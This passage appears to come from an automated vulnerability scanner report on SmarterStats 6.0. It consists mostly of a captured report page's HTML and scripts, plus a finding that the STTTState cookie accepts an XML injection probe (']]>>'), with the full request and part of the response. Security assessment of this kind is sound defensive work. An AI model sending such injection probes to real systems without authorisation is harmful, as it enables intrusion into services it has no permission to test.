           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fWebmaster');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dWebmaster'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.11. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STTTState cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; STTTState=]]>>; STHashCookie={"CountsGuid":"1008079301","TopBarSection":"UserDemographics"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:06 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=Webmaster" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
